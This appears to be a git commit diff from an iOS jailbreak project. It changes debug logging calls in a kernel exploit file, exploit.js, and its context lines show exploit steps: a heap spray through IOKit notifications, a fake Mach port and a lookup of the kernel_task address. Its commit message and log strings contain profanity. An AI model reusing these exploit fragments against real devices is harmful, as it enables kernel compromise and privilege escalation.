diff options
| author | spv420 <spv@spv.sh> | 2022-07-31 03:40:20 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-31 03:40:20 -0400 |
| commit | eb21089efd298dfec49ebd2836105f5d900d50ae (patch) | |
| tree | 3d4bd358218bcd42300e0e37891e49b3a5e8fbc9 | |
| parent | 5e2fcfa6ed69699d13b766b79f4959a1aff8c858 (diff) | |
fuck
| -rwxr-xr-x | src/stage4/kexp/exploit.js | 10 |
1 files changed, 5 insertions, 5 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js index 04b7c34..aa10126 100755 --- a/src/stage4/kexp/exploit.js +++ b/src/stage4/kexp/exploit.js @@ -187,7 +187,7 @@ function spray(dict, size, port) { ret = host_get_io_master(mach_host_self(), master); // p0laris_log("yahtzee3 %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master)); -// scall("p0laris_log", "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141); +// p0laris_log("0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141); ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port); // p0laris_log("yahtzee %d (%s)\n", ret, mach_error_string(ret)); @@ -368,7 +368,7 @@ function mach_ports_lookup_shit() { calls4arg("mach_ports_lookup", task_self, arrz, sz, 0); puts("helo"); p0laris_log("mpl success\n"); - scall("p0laris_log", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); + p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); p0laris_log("mpl success\n"); return read_u32(read_u32(arrz) + 8); @@ -479,7 +479,7 @@ again: while (true) { // mach_ports_lookup_shit_dealloc(); var ret__ = r3gister(mach_task_self(), arrz, 2, 3); mach_ports_lookup(mach_task_self(), arrz, sz); - scall("p0laris_log", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); + p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); p0laris_log("mpl success\n"); var fake_port = read_u32(read_u32(arrz) + 8); @@ -537,7 +537,7 @@ again: while (true) { p0laris_log("fuck\n"); var kernel_task_addr = shit_heap(4); p0laris_log("fuck\n"); - scall("p0laris_log", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr)); + p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr)); ret__ = pid_for_task(fake_port, kernel_task_addr); p0laris_log("%d %s\n", ret__, mach_error_string(ret__)); p0laris_log("fuck\n"); @@ -547,7 +547,7 @@ again: while (true) { if (kernel_task_addr === 0xffffffff) { continue again; } - scall("p0laris_log", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr)); + p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr)); p0laris_log("fuck\n"); p0laris_log("get lucky\n"); |